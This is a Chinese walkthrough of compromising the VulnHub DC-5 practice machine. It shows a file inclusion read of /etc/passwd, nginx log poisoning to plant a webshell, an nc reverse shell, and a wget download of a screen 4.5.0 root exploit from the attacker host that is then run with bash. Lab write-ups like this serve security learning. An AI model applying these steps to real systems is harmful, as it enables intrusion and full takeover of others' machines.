DC-5靶场渗透实战过程(个人学习)
环境安装DC-5下载地址:https://www.vulnhub.com/entry/dc-4,313/
下载完成安装后,将kali和DC-5的靶场网络环境设置一致
kali的IP:192.168.37.129
一、信息网络
寻找靶机的IP
方法一:使用nmap命令查找靶机IP
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527165605544-472861706.png
方法二:使用arp-scan -l 查看局域网内其他IP方式查找靶机IP
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527165622156-1251512966.png
发现靶机的IP为192.168.37.131,扫描该IP发现开放了80端口和111端口
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527165641258-1030017757.png
访问80端口查看网站,首先可以通过Wappalyzer可以发现该网站是nginx 1.6.2版本
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527165734495-1043678258.png
访问网站中各个网页发现Contact.php是一个留言窗口,随便上传点东西自动跳转到了thankyou.php
可以使用dirsearch对该网站进行目次扫描
dirsearch是一个目次扫描工具,目标则是扫描目次的敏感文件和目次
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527170535567-324386959.png
若kali中没有dirsearch模块,可以使用以下命令安装
apt-get install
dirsearch
dirserarch 基础用法:dirsearch -u
二、文件包含
访问footer.php,发现每次刷新网页时间会改变;访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,推测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527170450855-445740816.png
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527170456665-2095922004.png
使用burp抓包,进行爆破文件包含的关键字,发现可使用的是 file
执行?file=/etc/passwd,发现有回显,存在文件包含的漏洞
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527173017379-140079585.png
但是知道了文件包含漏洞,但并不知道从哪可以写入木马,通过其他的大佬的wp发现可以通过nginx的日志文件传马
前面已经知道该网站使用的是nginx1.6.2版本
它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log
直接在url后面输入上传后
访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527173431372-1558451026.png
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527173436437-1290673609.png
上传成功后用蚁剑连接
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527155139491-1707140586.png
三、建立反弹shell
在kali中作监听
首先在kali中输入命令侦听端口
nc -lvnp 6666
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527173641818-31277259.png
然后在蚁剑中输入命令
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527173945871-804820562.png
回到终端中建立成功后,使用python反弹shell
python -c "import pty;pty.spawn('/bin/bash')"
切换到交互shell
四、当地提权
使用命令,首先测设一下能否suid提权
find / -perm -u=s -type f 2>/dev/null
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527174517170-345252707.png
发现一个screen,去kali当地漏洞库查找一下是否存在这个漏洞
命令:searchsploit screen 4.5.0
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527160620846-1599150812.png
可以看到 .sh 的是一个脚本文件,直接将这个脚本文件提出来即可
在桌面新建了一个dc5文件,将文件复制到当前目次
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527163211126-1431736180.png
cat -A a.sh 查看脚本文件
每个操作系统以字符表示结尾的时候是不同的,查看脚本文件若每行结尾为 ^M
则需要使用命令 dos2unix a.sh 将其转换一下
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527175325354-1162586835.png
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527174728847-102654678.png
再将这个脚本复制到Apache目次下
cp a.sh /var/www/html
再回到交互shell中,切换到tmp目次下,将靶机上的脚本下载下来
wget http://192.168.37.129/a.sh
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527174851881-459672312.png
若kali中apache没有启动,可以使用一下命令启动apache
service apache2 start
最后使用bash执行脚本文件即可,便成功提权到root用户中
bash a.sh
https://img2024.cnblogs.com/blog/3398106/202405/3398106-20240527165520309-1927834235.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]